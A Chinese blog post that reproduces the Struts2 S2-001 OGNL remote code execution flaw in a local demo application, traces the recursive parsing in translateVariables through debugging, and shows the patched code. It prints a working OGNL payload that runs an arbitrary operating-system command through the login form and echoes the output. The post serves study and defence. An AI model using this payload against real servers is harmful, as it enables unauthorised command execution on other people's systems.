S2-001本地复现与分析

最新推荐文章于 2024-05-16 05:43:48 发布
最新推荐文章于 2024-05-16 05:43:48 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 漏洞利用 文章标签: struts2 远程代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Auuuuuuuu/article/details/86775808
版权

环境搭建:win10   eclipes ee    struts2.0.1   tomcat8

导入最基础的jar包

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">
  <display-name>S2-001 Example</display-name>
  <filter>
    <filter-name>struts2</filter-name>
    <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>

LoginAction.java

package com.au.demo.action;

import com.opensymphony.xwork2.ActionSupport;

public class LoginAction extends ActionSupport {
    private String username = null;
    private String password = null;

    public String getUsername() {
        return this.username;
    }

    public String getPassword() {
        return this.password;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    public String execute() throws Exception {
        if ((this.username.isEmpty()) || (this.password.isEmpty())) {
            return ERROR;
        }
        if ((this.username.equalsIgnoreCase("admin"))
                && (this.password.equals("password"))) {
            return SUCCESS;
        }
        return ERROR;
    }
}

index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
         pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<s:form action="login">
  <s:textfield name="username" label="username" />
  <s:textfield name="password" label="password" />
  <s:submit></s:submit>
</s:form>
</body>
</html>

struts.xml

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
	"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
	"http://struts.apache.org/dtds/struts-2.3.dtd">

<struts>
	<constant name="struts.devMode" value="true" /> 
	<package name="S2-001" extends="struts-default">
        <action name="login" class="com.au.demo.action.LoginAction">
            <result name="success">/welcome.jsp</result>
            <result name="error">/index.jsp</result>
        </action>
    </package>
	
</struts>

导入对应的xwork.jar源码进行调试(找源码坑死我了)

有需要的这是本人搭建的环境下载地址:

https://pan.baidu.com/s/1_BBEIfoX-WSjLHQcqstVPA   提取码:aklq

测试点击提交:

构造的ognl被执行:

任意代码执行的POC:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}

pwd替换为对应的命令,即可执行。

 

漏洞分析:

漏洞成因:

     可执行代码(ognl(可理解为代码)):

     在translateVariables方法中,递归解析表达式,在处理完%{password}后将password的值直接取出并继续在while循环中解析,若用户输入的password是恶意的ognl表达式,则得以解析执行。

     输入点:可构造恶意参数

     输出点:利用登录失败会重新返回页面并回带之前的输入内容

 

 

在xwork的jar包下com.opensymphony.xwork2.util.TextUtils 98行设置断点debug tomcat单步调试

关键代码:

 public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;

        while (true) {
            int start = expression.indexOf(open + "{");
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;

            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);

                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                	o = evaluator.evaluate(o);
                }
                

                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                if (o != null) {
                    if (TextUtils.stringSet(left)) {
                        result = left + o;
                    } else {
                        result = o;
                    }

                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }

                    expression = left + o + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
            } else {
                break;
            }
        }

        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

 

通过对比username和password来进行分析:

顺序执行,expression值为username

 

多个return递归回到该方法,通过  stack.findValue() 得到username的输入值, 最后aaa 被赋值给 expression

 

注意这里和password进行比较~

继续单步调试再次进入该方法(递归解析ognl):不符合while执行118行

此时不符合if条件     if ((start != -1) && (end != -1) && (count == 0)) 

进入多次return结束对username标签的执行回显到页面上


 

顺序执行,expression值为password

 

多个return递归回到该方法,通过  stack.findValue() 得到password的输入值,此时我们输入password的值 %{3+4}  被赋值给 expression

 

再次进入该方法,此时为ognl表示式,符合while条件和if判断,接下来就顺序解析了我们的  %{3+4}   expression赋值为7

进入多次return结束对password标签的执行回显到页面上

 

 

漏洞修复:

改变了ognl表达式的解析方法从而不会产生递归解析,用户的输入也不会再解析执行。

修补后的代码:增加判断

if (loopCount > maxLoopCount) {
    // translateVariables prevent infinite loop / expression recursive evaluation
    break;
}

当解析完一层表达式后,使其不符合上述判断,不再向下执行,执行break,跳出while(true)循环

源码(注释写的很清楚):

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
    // deal with the "pure" expressions first!
    //expression = expression.trim();
    Object result = expression;
    int loopCount = 1;
    int pos = 0;
    while (true) {
        
        int start = expression.indexOf(open + "{", pos);
        if (start == -1) {
            pos = 0;
            loopCount++;
            start = expression.indexOf(open + "{");
        }
        if (loopCount > maxLoopCount) {
            // translateVariables prevent infinite loop / expression recursive evaluation
            break;
        }
        int length = expression.length();
        int x = start + 2;
        int end;
        char c;
        int count = 1;
        while (start != -1 && x < length && count != 0) {
            c = expression.charAt(x++);
            if (c == '{') {
                count++;
            } else if (c == '}') {
                count--;
            }
        }
        end = x - 1;

 

hackersb123
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Struts2远程代码执行漏洞(S2-001)复现,腾讯网络安全开发面试
2301_79655589的博客
04-03 988
… welcome.jsp … 登录成功 , …web.xml文件部分配置如下所示,这是一种J2EE配置文件,决定se
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
wanan的博客
09-03 1824
vulhub靶场搭建以及对于struts2漏洞s2-001的idea环境调试搭建,ctf.show的java(web279-web280)
S2-001漏洞分析
灰蜗牛
02-23 1187
Struts2是流行和成熟的基于MVC设计模式的Web应用程序框架。S2-001漏洞是由于 Struts 2 框架处理 HTTP 请求中某些参数的方式存在缺陷。具体来说,该框架无法正确验证这些参数中的用户输入,从而允许攻击者将恶意负载注入应用程序。有效负载可以包含应用程序处理请求时在服务器上执行的任意代码
Apache Struts2远程代码执行漏洞(S2-001)复现
最新发布
2401_84545618的博客
05-16 904
​ 进行过响应处理后,在invokeaction()方法中会通过反射方式调用对应action里的execute()方法,这里获取的是LoginAction中的execute()方法,而后调用invoke()方法调用。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。提交后,发现其执行了表达式,得出结果为2,并显示在对应的密码框中。
漏洞代码调试(二):Strtus2-001代码分析调试
thelostworld
08-20 715
​ Strtus2-001代码分析调试(学习笔记) 一、漏洞描述: Struts2 中的validation机制。validation依靠validation和workflow两个拦截器。validation会根据配置的xml文件创建一个特殊字段错误列表。而workflow则会根据validation的错误对其进行检测,如果输入有值,将会把用户带回到原先提交表单的页面,并且将值返回。反之,在默认情况下,如果控制器没有得到任何的输入结果但是有validation验证错误。那么用户...
洞态IAST自动检测S2-001漏洞
weixin_40418457的博客
04-30 273
一、使用Dongtai-IAST检测S2-001漏洞 1. 启动在线靶场 登陆在线靶场:http://labs.iast.huoxian.cn:8081,启动`S2-001`环境,等待环境启动之后,点击**访问靶场**按钮即可前往靶场环境。该环境来源于`vulhub`和`vulapps` 2. 登陆**洞态IAST**网站:http://iast.huoxian.cn:8000/,查看漏洞检测结果 3. 进入搜索功能,分析完整的污点调用图 3.1 Source点 首先,在org.apache.strut
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
然而,这个框架的历史上存在一系列的安全漏洞,其中特别值得关注的是与反序列化相关的漏洞,如s2-005、s2-016、s2-016_3和s2-017。这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而...
s2-geometry-library-java.jar
01-16
空间索引;谷歌;...s2-geometry-library-java.jar;cellId;空间点;地理信息;GIS;空间技术;空间索引;谷歌;google;s2-geometry-library-java.jar;cellId;空间点;地理信息;GIS;空间技术;
S2-LP中文手册.pdf
12-30
ST公司无线收发芯片S2-LP中文数据手册
『Java安全』IntelliJ IDEA搭建老版本Struts 2环境_S2-001复现环境搭建
Ho1aAs‘s Blog
07-28 605
前言 为了复现S2-001做准备,IDEA版本为2021.2、Struts2版本为2.0.8 一、下载Struts 2 lib 二、IDEA创建Struts2项目 三、配置修改和创建demo
S2-001 远程代码执行漏洞
a1b2c3是弱口令
12-10 4700
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 对漏洞进行测试,首先在password地方输入%{1+...
【研究】Struts2漏洞之S2-001漏洞环境和POC
god_Zeo的安全博客
07-01 2106
【研究】Struts2漏洞之S2-001漏洞环境和POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{v...
Struts2 远程代码执行漏洞S2-001分析
st3pby的博客
01-05 830
首先来了解 OGNL 表达式,OGNL(Object Graphic Navigatino Language)的中文全称为“对象图导航语言”,是应用于Java中的一个开源的功能强大的表达式语言(Expression Language),它被集成在Struts2等框架中,通过简单一致的表达式语法,可以存取对象的任何属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。OGNL进行对象存取操作的API在Ognl.java文件中,分别是getValue、setValue两个方法。
S2-001漏洞复现
baidu_38844729的博客
11-14 382
漏洞原理 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 漏洞利用 切换到s2-001目录下,搭建启动测试环境 ...
s2-005漏洞复现
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts 2.0.0-2.1.8.1。你可以在vulhub的GitHub仓库中找到搭建了该漏洞的示例环境。首先,你可以使用能够爆出路径的payload验证目标网址是否存在s2-005漏洞。然后,使用执行代码的payload进行利用。需要注意的是,不同的博主可能会提供不同的payload,所以如果一个payload无法利用,可以尝试其他的payload。 关于具体的漏洞复现步骤和细节,请参考相关资源和教程。由于时间和篇幅的限制,无法提供完整的复现过程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值